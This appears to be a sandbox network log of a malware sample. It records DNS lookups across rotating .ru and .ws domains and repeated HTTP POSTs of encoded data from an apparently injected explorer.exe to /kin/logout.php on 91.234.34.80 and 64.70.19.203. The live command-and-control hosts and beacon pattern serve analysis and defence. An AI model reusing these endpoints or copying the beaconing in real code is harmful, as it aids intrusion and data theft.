Aug 1, 2021 13:07:27.582727909 CEST	192.168.2.3	8.8.8.8	0x72fe	Standard query (0)	xircus.one	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:30.750453949 CEST	192.168.2.3	8.8.8.8	0x20b	Standard query (0)	crustbuster.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:34.400907993 CEST	192.168.2.3	8.8.8.8	0xc10	Standard query (0)	mockupery.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:37.614039898 CEST	192.168.2.3	8.8.8.8	0x4ed6	Standard query (0)	blobbb.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:41.208498955 CEST	192.168.2.3	8.8.8.8	0xed7e	Standard query (0)	xircus.org.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:44.392422915 CEST	192.168.2.3	8.8.8.8	0xa7bb	Standard query (0)	flamable.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:48.231177092 CEST	192.168.2.3	8.8.8.8	0xe091	Standard query (0)	firecrackers.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:51.526628971 CEST	192.168.2.3	8.8.8.8	0x10df	Standard query (0)	firecrackers.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:54.615502119 CEST	192.168.2.3	8.8.8.8	0x3805	Standard query (0)	firecrackers.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:08:00.876514912 CEST	192.168.2.3	8.8.8.8	0x795f	Standard query (0)	ghostlyy.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:08:04.040344000 CEST	192.168.2.3	8.8.8.8	0x62c8	Standard query (0)	cooperal.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:08:07.765604973 CEST	192.168.2.3	8.8.8.8	0xfd5e	Standard query (0)	xircus.ws	A (IP address)	IN (0x0001)
Aug 1, 2021 13:08:10.807061911 CEST	192.168.2.3	8.8.8.8	0x258e	Standard query (0)	xircus.ws	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 1, 2021 13:06:19.444833040 CEST	8.8.8.8	192.168.2.3	0xc7f7	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Aug 1, 2021 13:06:46.002810001 CEST	8.8.8.8	192.168.2.3	0xa900	Name error (3)	flamable.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:06:48.725323915 CEST	8.8.8.8	192.168.2.3	0x9dca	No error (0)	firecrackers.ru		91.234.34.80	A (IP address)	IN (0x0001)
Aug 1, 2021 13:06:51.591469049 CEST	8.8.8.8	192.168.2.3	0x6e29	No error (0)	firecrackers.ru		91.234.34.80	A (IP address)	IN (0x0001)
Aug 1, 2021 13:06:52.579235077 CEST	8.8.8.8	192.168.2.3	0xe87c	No error (0)	firecrackers.ru		91.234.34.80	A (IP address)	IN (0x0001)
Aug 1, 2021 13:06:57.371470928 CEST	8.8.8.8	192.168.2.3	0xfbff	No error (0)	firecrackers.ru		91.234.34.80	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:06.907207966 CEST	8.8.8.8	192.168.2.3	0xae4f	Name error (3)	ghostlyy.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:10.535051107 CEST	8.8.8.8	192.168.2.3	0x5171	Name error (3)	cooperal.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:13.874402046 CEST	8.8.8.8	192.168.2.3	0xf25e	No error (0)	xircus.ws		64.70.19.203	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:16.450809002 CEST	8.8.8.8	192.168.2.3	0x8dce	No error (0)	xircus.ws		64.70.19.203	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:16.993421078 CEST	8.8.8.8	192.168.2.3	0x908a	No error (0)	xircus.ws		64.70.19.203	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:20.603168964 CEST	8.8.8.8	192.168.2.3	0x3958	No error (0)	xircus.ws		64.70.19.203	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:27.617341995 CEST	8.8.8.8	192.168.2.3	0x72fe	Name error (3)	xircus.one	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:31.242046118 CEST	8.8.8.8	192.168.2.3	0x20b	Name error (3)	crustbuster.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:34.478733063 CEST	8.8.8.8	192.168.2.3	0xc10	Name error (3)	mockupery.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:38.066858053 CEST	8.8.8.8	192.168.2.3	0x4ed6	Name error (3)	blobbb.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:41.260489941 CEST	8.8.8.8	192.168.2.3	0xed7e	Name error (3)	xircus.org.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:44.912379026 CEST	8.8.8.8	192.168.2.3	0xa7bb	Name error (3)	flamable.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:48.304867029 CEST	8.8.8.8	192.168.2.3	0xe091	No error (0)	firecrackers.ru		91.234.34.80	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:51.559415102 CEST	8.8.8.8	192.168.2.3	0x10df	No error (0)	firecrackers.ru		91.234.34.80	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:54.642896891 CEST	8.8.8.8	192.168.2.3	0x3805	No error (0)	firecrackers.ru		91.234.34.80	A (IP address)	IN (0x0001)
Aug 1, 2021 13:08:00.909454107 CEST	8.8.8.8	192.168.2.3	0x795f	Name error (3)	ghostlyy.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:08:04.614290953 CEST	8.8.8.8	192.168.2.3	0x62c8	Name error (3)	cooperal.ru	none	none	A (IP address)	IN (0x0001)
Aug 1, 2021 13:08:07.798222065 CEST	8.8.8.8	192.168.2.3	0xfd5e	No error (0)	xircus.ws		64.70.19.203	A (IP address)	IN (0x0001)
Aug 1, 2021 13:08:10.841388941 CEST	8.8.8.8	192.168.2.3	0x258e	No error (0)	xircus.ws		64.70.19.203	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

firecrackers.ru

xircus.ws

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49752	91.234.34.80	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:06:51.659396887 CEST	5269	OUT	POST /kin/logout.php?id=5477845 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: firecrackers.ru Content-Length: 1067 Cache-Control: no-cache
Aug 1, 2021 13:06:51.659507036 CEST	5270	OUT	Data Raw: 65 6f 79 69 73 63 3d 32 35 37 35 31 38 32 38 26 67 73 65 71 63 6f 61 6d 3d 30 34 33 33 37 36 37 61 37 66 66 34 62 65 63 64 38 61 36 64 61 33 36 32 26 69 77 6b 79 3d 32 38 64 61 31 31 64 32 32 32 62 32 64 62 34 34 65 32 66 63 30 63 62 61 64 62 30 Data Ascii: eoyisc=25751828&gseqcoam=0433767a7ff4becd8a6da362&iwky=28da11d222b2db44e2fc0cbadb00ba448b0b1a3cc01b034f0d511e65b6d79642a293d77465bb2a5160ec1411e118c3db26f13debd6579d59f0d795346edbfd8b94ba39a028bd7b9b24008ccd242f8aa8d7556c2c94ff1a82bb513c4dfe00
Aug 1, 2021 13:06:51.719811916 CEST	5270	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:06:51 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php?id=5477845 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Aug 1, 2021 13:06:52.164333105 CEST	5278	OUT	GET /kin/logout.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: firecrackers.ru
Aug 1, 2021 13:06:52.223417997 CEST	5278	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:06:52 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49754	91.234.34.80	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:06:55.213824987 CEST	5282	OUT	POST /kin/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: firecrackers.ru Content-Length: 1099 Cache-Control: no-cache
Aug 1, 2021 13:06:55.213920116 CEST	5283	OUT	Data Raw: 77 73 6f 6b 3d 33 34 63 39 31 64 32 37 65 65 37 35 32 62 65 61 64 31 66 38 39 30 33 32 35 66 63 62 65 32 66 66 66 37 34 66 32 63 63 34 37 64 37 33 26 75 6f 69 63 77 71 6b 65 3d 37 37 36 34 36 32 30 32 26 79 77 75 73 71 6f 3d 63 62 32 30 61 33 30 Data Ascii: wsok=34c91d27ee752bead1f890325fcbe2fff74f2cc47d73&uoicwqke=77646202&ywusqo=cb20a30cd0693acc1d5dbcfbe1efe888b5083cac3169ba9181cc41653a76eecc92f449f30e5ee0faec506a727ad451659176e4eea138bf9a3b795f5d2c985f7678314b422caad2b8c24d054c734b20bf2da22c2a
Aug 1, 2021 13:06:55.273590088 CEST	5283	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:06:55 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49759	91.234.34.80	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:06:59.972126007 CEST	5461	OUT	POST /kin/logout.php?page=23 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: firecrackers.ru Content-Length: 1108 Cache-Control: no-cache
Aug 1, 2021 13:06:59.972157955 CEST	5462	OUT	Data Raw: 74 6d 6c 65 78 3d 36 38 32 34 35 37 63 36 36 66 38 33 33 62 62 38 65 66 65 66 35 39 39 35 62 31 62 33 61 34 62 62 31 39 66 37 34 37 62 61 61 65 32 34 26 72 69 66 77 6e 6b 62 73 70 3d 33 30 32 34 32 32 30 31 26 76 71 72 6d 68 69 64 3d 30 31 38 34 Data Ascii: tmlex=682457c66f833bb8efef5995b1b3a4bb19f747baae24&rifwnkbsp=30242201&vqrmhid=0184a4e87c1719f721871eabf74a8d2f377b0495d0ea2923328785249f1a5223ea0b83f0f64383568be57342b6492ff58fab8802b11761937f239dc9fd641922933620d3c22717c63b27babf940ec1159a865
Aug 1, 2021 13:07:00.026253939 CEST	5463	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:07:00 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php?page=23 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Aug 1, 2021 13:07:00.321496010 CEST	5487	OUT	GET /kin/logout.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: firecrackers.ru
Aug 1, 2021 13:07:00.375582933 CEST	5518	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:07:00 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49768	64.70.19.203	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:07:16.617347002 CEST	6156	OUT	POST /kin/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xircus.ws Content-Length: 1090 Cache-Control: no-cache
Aug 1, 2021 13:07:16.617403984 CEST	6157	OUT	Data Raw: 74 73 72 6b 6a 69 62 61 7a 3d 63 38 61 35 31 62 36 63 61 37 64 39 34 30 33 36 65 32 35 36 39 64 63 66 33 37 33 30 62 34 38 32 62 62 33 61 61 63 26 72 6f 6c 63 7a 77 6e 3d 38 33 32 31 38 30 34 37 26 76 77 78 73 74 3d 34 43 37 45 38 30 34 37 30 41 Data Ascii: tsrkjibaz=c8a51b6ca7d94036e2569dcf3730b482bb3aac&rolczwn=83218047&vwxst=4C7E80470A963D6F9F43309B2D0B70E7876FF22E07D7481C5D538EA32CD9E014F13336E5C3A49C2763AB15F22F5E8264E0F49945EE077546F2890BF97258402A637C987F0F9C662DE5141366AB2953CEC8D76ABC948
Aug 1, 2021 13:07:16.783230066 CEST	6157	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Sun, 01 Aug 2021 11:07:16 GMT Content-Type: text/html Content-Length: 154 Connection: keep-alive Allow: GET,HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49770	64.70.19.203	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:07:20.065203905 CEST	6169	OUT	POST /kin/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xircus.ws Content-Length: 1111 Cache-Control: no-cache
Aug 1, 2021 13:07:20.065283060 CEST	6170	OUT	Data Raw: 6d 79 6b 77 69 75 3d 35 36 30 34 36 35 38 34 26 6f 63 71 65 73 67 75 69 3d 31 32 36 39 41 35 44 32 43 39 45 31 32 39 38 30 35 41 30 46 35 44 45 32 33 46 43 31 39 35 37 43 35 42 35 35 35 35 35 31 32 33 39 39 35 43 42 36 37 32 44 34 32 31 46 37 32 Data Ascii: mykwiu=56046584&ocqesgui=1269A5D2C9E129805A0F5DE23FC1957C5B55555123995CB672D421F72A21F4034C9C&qgwm=10b923ebdbcaee157c3c27c89c6dd532da2dc2cfc0cc340339ecb2591a591c24d98cbe1524ce7c70184291310502d449b88f13847855cac93ce378bc7484a8a7925718ae620e3aa9
Aug 1, 2021 13:07:20.230993986 CEST	6171	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Sun, 01 Aug 2021 11:07:20 GMT Content-Type: text/html Content-Length: 154 Connection: keep-alive Allow: GET,HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49771	64.70.19.203	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:07:24.271327019 CEST	6182	OUT	POST /kin/logout.php?id=5447518 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xircus.ws Content-Length: 1093 Cache-Control: no-cache
Aug 1, 2021 13:07:24.271399021 CEST	6183	OUT	Data Raw: 73 71 6f 6d 3d 38 30 34 34 31 37 31 32 26 75 75 75 75 75 75 3d 39 41 31 32 44 35 34 44 38 30 31 36 45 34 44 41 43 43 42 36 31 31 44 31 34 30 34 35 41 39 36 34 34 34 38 30 43 43 45 32 46 35 41 35 44 45 38 37 37 30 30 36 44 46 36 37 33 43 33 45 33 Data Ascii: sqom=80441712&uuuuuu=9A12D54D8016E4DACCB611D14045A9644480CCE2F5A5DE877006DF673C3E39&wyacegik=970E54466725B1A22FDD05CCF5F968CEEB444CB1D04F6BB495442B1A098DC83B2C604B18EBB4C9D3AA7877E99A5A3515E04ED87634797C341DF6DCD9515C339627C4104DDCDEEF935E8F60
Aug 1, 2021 13:07:24.435400009 CEST	6184	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Sun, 01 Aug 2021 11:07:24 GMT Content-Type: text/html Content-Length: 154 Connection: keep-alive Allow: GET,HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49772	91.234.34.80	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:07:50.879246950 CEST	6186	OUT	POST /kin/logout.php?pid=660 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: firecrackers.ru Content-Length: 1084 Cache-Control: no-cache
Aug 1, 2021 13:07:50.879343033 CEST	6187	OUT	Data Raw: 64 6d 70 79 62 6b 6e 77 66 3d 39 31 30 41 31 38 39 45 30 32 38 35 34 35 37 42 30 42 39 45 46 41 44 44 42 39 41 36 46 33 31 41 26 62 69 6a 71 72 79 7a 3d 34 32 38 31 39 33 38 31 26 66 71 76 67 6c 3d 42 33 35 39 39 36 31 44 45 41 38 37 31 45 44 35 Data Ascii: dmpybknwf=910A189E0285457B0B9EFADDB9A6F31A&bijqryz=42819381&fqvgl=B359961DEA871ED525985F9092845F766C25C0AE3F14E84714EFB59BA285BB429701A5C36420EC3164399D745E2FD71B2BBED59FDE8546FDEEA2FD7D13A39FDC8A0512EBD31BF7472352F626D2BF0761D2140C6CB5078CB1A
Aug 1, 2021 13:07:50.938711882 CEST	6188	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:07:50 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php?pid=660 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Aug 1, 2021 13:07:51.148190975 CEST	6190	OUT	GET /kin/logout.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: firecrackers.ru
Aug 1, 2021 13:07:51.208386898 CEST	6190	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:07:51 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49774	91.234.34.80	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:07:54.138004065 CEST	6193	OUT	POST /kin/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: firecrackers.ru Content-Length: 1105 Cache-Control: no-cache
Aug 1, 2021 13:07:54.138143063 CEST	6195	OUT	Data Raw: 75 75 75 75 75 75 75 75 3d 30 34 43 33 32 46 31 41 45 38 35 38 46 44 33 41 46 32 46 39 37 32 39 46 36 33 30 39 36 41 44 35 45 38 43 30 39 33 37 44 46 33 34 36 36 42 42 44 38 36 45 42 44 30 46 44 36 33 41 37 42 42 26 73 71 6f 6d 6b 69 3d 39 32 38 Data Ascii: uuuuuuuu=04C32F1AE858FD3AF2F9729F63096AD5E8C0937DF3466BBD86EBD0FD63A7BB&sqomki=92879504&wyac=d5a9be89d240a48a15b72cf685ba9985f2cba513213724afade5f6e1d1001c6a7aa39e0101bcd757b58b071c213d6e9140af171b02e5aca1b16e03b6058092aa10c6ceb2ddb2efb86ee751
